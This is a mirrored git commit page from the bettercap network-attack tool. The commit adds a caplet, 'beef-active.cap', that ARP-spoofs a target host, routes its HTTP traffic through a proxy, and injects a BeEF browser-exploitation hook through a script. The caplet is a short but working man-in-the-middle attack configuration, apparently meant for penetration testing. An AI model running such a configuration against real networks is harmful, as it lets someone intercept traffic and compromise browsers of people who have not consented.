mirror of
https://github.com/bettercap/bettercap
synced 2025-08-14 10:46:57 -07:00
fix: fixed arp spoofer stop
This commit is contained in:
parent
7248dd701a
commit
a849692468
2 changed files with 20 additions and 3 deletions
17
caplets/beef-active.cap
Normal file
17
caplets/beef-active.cap
Normal file
|
@ -0,0 +1,17 @@
|
|||
set arp.spoof.targets 192.168.1.53
|
||||
# inject beef hook
|
||||
set http.proxy.script caplets/beef-inject.js
|
||||
# keep reading arp table for network mapping
|
||||
net.recon on
|
||||
# redirect http traffic to a proxy
|
||||
http.proxy on
|
||||
# wait for everything to start properly
|
||||
sleep 1
|
||||
|
||||
arp.spoof on
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue